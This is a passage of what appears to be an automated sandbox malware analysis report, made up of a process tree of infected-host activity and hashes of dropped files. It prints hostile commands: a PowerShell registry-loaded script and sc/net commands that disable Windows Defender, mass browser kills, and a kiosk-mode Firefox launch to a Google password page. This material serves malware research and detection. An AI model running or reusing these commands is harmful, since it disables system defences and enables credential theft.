                            • Suspicious use of FindShellTrayWindow
                            PID:5332
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffa576746f8,0x7ffa57674708,0x7ffa57674718
                              5⤵
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              PID:5304
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
                              5⤵
                                PID:5692
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
                                5⤵
                                  PID:5564
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2788 /prefetch:8
                                  5⤵
                                    PID:5844
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:3872
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:3252
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:6180
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
                                    5⤵
                                    • Uses browser remote debugging
                                    PID:6188
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,2388655909625210781,9587570651494271272,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
                                    5⤵
                                      PID:6684
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\DHCGHDHIDH.exe"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:7072
                                    • C:\Users\Admin\Documents\DHCGHDHIDH.exe
                                      "C:\Users\Admin\Documents\DHCGHDHIDH.exe"
                                      5⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      PID:7124
                                • C:\Users\Admin\AppData\Local\Temp\1013728001\e76f3fd3f8.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1013728001\e76f3fd3f8.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:2644
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM firefox.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1460
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM chrome.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4368
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM msedge.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3880
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM opera.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2300
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /F /IM brave.exe /T
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2356
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                    4⤵
                                      PID:892
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                        5⤵
                                        • Checks processor information in registry
                                        • Modifies registry class
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        • Suspicious use of SetWindowsHookEx
                                        PID:3856
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9835dca7-d7cc-45c6-9b04-7b3d6ddbcf46} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" gpu
                                          6⤵
                                            PID:3196
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2364 -prefMapHandle 2344 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ba0f603-420a-40cd-989b-01ae906f3a79} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" socket
                                            6⤵
                                              PID:484
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3148 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 1372 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5ae2823-20d6-468d-8720-6eb8cb792105} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" tab
                                              6⤵
                                                PID:3864
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4176 -childID 2 -isForBrowser -prefsHandle 4168 -prefMapHandle 4164 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d7810ac-2212-434e-8ac0-9ac3f80cef32} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" tab
                                                6⤵
                                                  PID:4400
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4900 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4876 -prefMapHandle 4028 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6714b87e-b60e-46a2-9c71-b5d118b444ab} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" utility
                                                  6⤵
                                                  • Checks processor information in registry
                                                  PID:5888
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5012 -childID 3 -isForBrowser -prefsHandle 5124 -prefMapHandle 5128 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {194d5aed-5f6f-4969-91d7-2e571a21d84b} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" tab
                                                  6⤵
                                                    PID:5256
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5284 -childID 4 -isForBrowser -prefsHandle 5252 -prefMapHandle 5148 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1c4d614-8911-4301-9d11-b199915b3acf} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" tab
                                                    6⤵
                                                      PID:5280
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5480 -childID 5 -isForBrowser -prefsHandle 5488 -prefMapHandle 5496 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf2f6e3c-eefa-4590-97c0-0ce6350510c9} 3856 "\\.\pipe\gecko-crash-server-pipe.3856" tab
                                                      6⤵
                                                        PID:5292
                                                • C:\Users\Admin\AppData\Local\Temp\1013729001\98149ae997.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1013729001\98149ae997.exe"
                                                  3⤵
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Windows security modification
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2088
                                            • C:\Windows\servicing\TrustedInstaller.exe
                                              C:\Windows\servicing\TrustedInstaller.exe
                                              1⤵
                                                PID:2632
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                  2⤵
                                                  • Modifies Windows Defender Real-time Protection settings
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4900
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    "C:\Windows\system32\sc.exe" qc windefend
                                                    3⤵
                                                    • Launches sc.exe
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3044
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3484
                                                  • C:\Windows\SysWOW64\whoami.exe
                                                    "C:\Windows\system32\whoami.exe" /groups
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2140
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    "C:\Windows\system32\net1.exe" stop windefend
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2704
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                    3⤵
                                                    • Launches sc.exe
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1308
                                              • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                1⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2212
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3680 -ip 3680
                                                1⤵
                                                  PID:1924
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4676 -ip 4676
                                                  1⤵
                                                    PID:3008
                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                    1⤵
                                                      PID:4024
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                      1⤵
                                                        PID:4184
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4524 -ip 4524
                                                        1⤵
                                                          PID:6404
                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:1616
                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:6428

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\ProgramData\CBFBKFIDHIDGHJKFBGHCFIEHJD

                                                          Filesize

                                                          5.0MB

                                                          MD5

                                                          ddaffee708f22a13d50fe4cf14cf49d9

                                                          SHA1

                                                          16a3a568ed44926aeff80727aa23f67f70d5e571

                                                          SHA256

                                                          56d4aaee3d420e8f4aa59e4c3becb04308e217675a838553291a899e29be02c2

                                                          SHA512

                                                          8afd7e846ae2d793c6a8cca93d9255622db2cba5725a0505b680366698401cbc3b175dab1a0218dba5e3aa6480f2a6e0625c07a9e0a3959ad624462220f64244

                                                        • C:\ProgramData\CBKJJEHC

                                                          Filesize

                                                          114KB

                                                          MD5

                                                          e3bad5a8407ce8be2e003acd06598035

                                                          SHA1

                                                          a6bc025a692ae74493b231311373d214b72fd9b1

                                                          SHA256

                                                          29a8f30850aa6f08ad492c71594de5844e11ab1a9bc4b8e0432b137fb8ca2d69

                                                          SHA512

                                                          cce663e7318c9a9723a676e100dc77c47399f3ca3c25729781eddd4c63e7797c93ccca34c49a0eb725806691ffbec2699dd7d450f14cbbaeff8a3bb07a57e082

                                                        • C:\ProgramData\KJKEHIIJ

                                                          Filesize

                                                          116KB

                                                          MD5

                                                          f70aa3fa04f0536280f872ad17973c3d

                                                          SHA1

                                                          50a7b889329a92de1b272d0ecf5fce87395d3123

                                                          SHA256

                                                          8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                          SHA512

                                                          30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                        • C:\ProgramData\mozglue.dll

                                                          Filesize

                                                          593KB

                                                          MD5

                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                          SHA1

                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                          SHA256

                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                          SHA512

                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                        • C:\ProgramData\nss3.dll

                                                          Filesize

                                                          2.0MB

                                                          MD5

                                                          1cc453cdf74f31e4d913ff9c10acdde2

                                                          SHA1

                                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                          SHA256

                                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                          SHA512

                                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                          Filesize

                                                          2B

                                                          MD5

                                                          d751713988987e9331980363e24189ce

                                                          SHA1

                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                          SHA256

                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                          SHA512

                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          25604a2821749d30ca35877a7669dff9

                                                          SHA1

                                                          49c624275363c7b6768452db6868f8100aa967be

                                                          SHA256

                                                          7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                          SHA512

                                                          206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                          Filesize

                                                          150B

                                                          MD5

                                                          3665a3771e4714cf26786223cce46031

                                                          SHA1

                                                          e6573b25bf98b5afe65a432488ddc0a3aa24dfde

                                                          SHA256

                                                          fdccc5320032a58ec175e1f020fa4ebd333df1ba848cb36588be0fb5321988ae

                                                          SHA512

                                                          cfdb8fabd0ca8874a7d1f838b4e46b439c413b4e8714c883fb301c7265f70c8cb4b48fa264782d7dfb15c83fdd37d53887ec48ee2a43390a6bfdfba63cc0ad66

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\57e00fdc-da54-4405-9a1d-e6bed24e2e03.dmp

                                                          Filesize

                                                          826KB

                                                          MD5

                                                          8b962abf75c532fa324130bb99f40168

                                                          SHA1

                                                          0b36399f5ad74e1f1237d1dbcee384c088ca69aa

                                                          SHA256

                                                          1204f5b31085dbf3020f145dd86e38911a135cc9b2f41b30b0d0365ba6a02ba0

                                                          SHA512

                                                          c1b43ed7c7a5fa65379448c55f5602c0ebf6cbf374e7c7a1ea9952fbbdf755c5642757983c309e86f7cfa59f4d162bc08da17540bd8e36e6af4159a3d607b245

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          152B

                                                          MD5

                                                          ba6ef346187b40694d493da98d5da979

                                                          SHA1

                                                          643c15bec043f8673943885199bb06cd1652ee37

                                                          SHA256

                                                          d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

                                                          SHA512

                                                          2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          152B

                                                          MD5

                                                          b8880802fc2bb880a7a869faa01315b0

                                                          SHA1

                                                          51d1a3fa2c272f094515675d82150bfce08ee8d3

                                                          SHA256

                                                          467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

                                                          SHA512

                                                          e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                          Filesize

                                                          152B

                                                          MD5

                                                          fb4d0d2aa82efd95ae78f0870fbd90e4

                                                          SHA1

                                                          257641ec16983cfa89c7b8ee2327c5ec2192fc98

                                                          SHA256

                                                          d83ceacb3110e18857ad9f83cd0cfde8dc57f3bc1ff0f755c63d0e4180755ef2

                                                          SHA512

                                                          e173c4a6605c612b4b22bc31da6df1fa5e14f544ff8ae6f07fca33b6d51d4b99b5047f42a4b10d506296e51bd83a84e0c2c33c28a3a9a25dd6af1aebdf243ce5

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                          Filesize

                                                          5KB

                                                          MD5

                                                          059dc3b597072fa172bd87fdf498f52b

                                                          SHA1

                                                          7db4e390c1b2220cc55b3567d11868f5a053e9ff

                                                          SHA256

                                                          f20ba3e6d7c870580e8359e52f7261d233779ddbbdf57e94084c0267763f3e1f

                                                          SHA512

                                                          2c2d75955a13923bcd6fc88e4ecf35d6b470be28a9072b2f1db71f3478e272f2d13438516b1f52058e4d34a6db429122ea28db24a4d2bf10d8ef683551104d29

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0BHOTC3C\download[1].htm

                                                          Filesize

                                                          1B

                                                          MD5

                                                          cfcd208495d565ef66e7dff9f98764da

                                                          SHA1

                                                          b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                          SHA256

                                                          5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                          SHA512

                                                          31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          20KB

                                                          MD5

                                                          4973bcd462121e74f07b590916100f0e

                                                          SHA1

                                                          97764f4baf813ff1396de7497382718a593c06aa

                                                          SHA256

                                                          eafc21526dddca20070c5dc3509593cb9cfeffa78975b2a30329f97968f6f7fe

                                                          SHA512

                                                          4175220b4a9e627cd3dc033310d1d3e6efade1e853acebaf6362c2201cb5f0ecee25bbe1b1eb3634984ace38fa43a396622382f7bbc7db726235929eb717fc8c

                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\activity-stream.discovery_stream.json.tmp

                                                          Filesize

                                                          19KB

                                                          MD5

                                                          93ed43eb27bfb59c7089c5bf5552a7d7

                                                          SHA1

                                                          1b2f53104274a8685500ade719dfa3d304a33b3e

                                                          SHA256

                                                          52f4488436b81cb650586ff46992beb7312ac29dc157752af0c47a4252f6338a

                                                          SHA512

                                                          f2cc1e8b2eb2eb11e8a8ee09d437179896bf6e3115b3b532fe25102ec3cefdecc4a1650f0c1de6306ee69f1a815b3b12c12cedbd24726c55caf35e4765a3be5a

                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984

                                                          Filesize

                                                          13KB

                                                          MD5

                                                          0b1b1d74ecdcb346778ed8bcbbdab549

                                                          SHA1

                                                          0d4f9b97f807776a6e00e7faf6bbb6f792ba47b2

                                                          SHA256

                                                          257167ebc5f1d5c415b53b85f364db1151f99ab8330ef470d6ab7abb97c7227e

                                                          SHA512

                                                          9cda943434dc7c65d3ed30193a7d993942c89565a9c7c9ff6169f83d22c25d30f27769d29aa6b574f3a798e4cb461209a2212a8ec50b9aed796ec2b66ffeba38

                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\cache2\entries\F8CBD54DDA10F4286A41EC6A537240712D6C2308

                                                          Filesize

                                                          9KB

                                                          MD5

                                                          91d9bd10b9d5686f98b1e688f96c4a7a

                                                          SHA1

                                                          31aba46c92fecb3f2a1172f7714e1dd5ca4eec71

                                                          SHA256

                                                          fed3a91f68350fe98ee07bd91886765c9f6915cf521b78feb827eb06bee01221

                                                          SHA512

                                                          36cc35c6ce41f6addb724d8072aa34cd4c7e1323a1675530944b174d305e9814bafc7615557d44be39f804dca0a8af6fcf5e94d66f74d46f3a10afa8afc9f363

                                                        • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\y0bypz8z.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                          Filesize

                                                          15KB

                                                          MD5

                                                          96c542dec016d9ec1ecc4dddfcbaac66

                                                          SHA1

                                                          6199f7648bb744efa58acf7b96fee85d938389e4

                                                          SHA256

                                                          7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                                          SHA512

                                                          cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                                        • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe

                                                          Filesize

                                                          2.5MB

                                                          MD5

                                                          2a78ce9f3872f5e591d643459cabe476

                                                          SHA1

                                                          9ac947dfc71a868bc9c2eb2bd78dfb433067682e

                                                          SHA256

                                                          21a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae

                                                          SHA512

                                                          03e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9

                                                        • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe

                                                          Filesize

                                                          1.7MB

                                                          MD5

                                                          40f8c17c136d4dc83b130c9467cf6dcc

                                                          SHA1

                                                          e9b6049aa7da0af9718f2f4ae91653d9bac403bb

                                                          SHA256

                                                          cafb60920939bd2079d96f2e6e73f87632bc15bd72998f864e8968f7aab9623b

                                                          SHA512

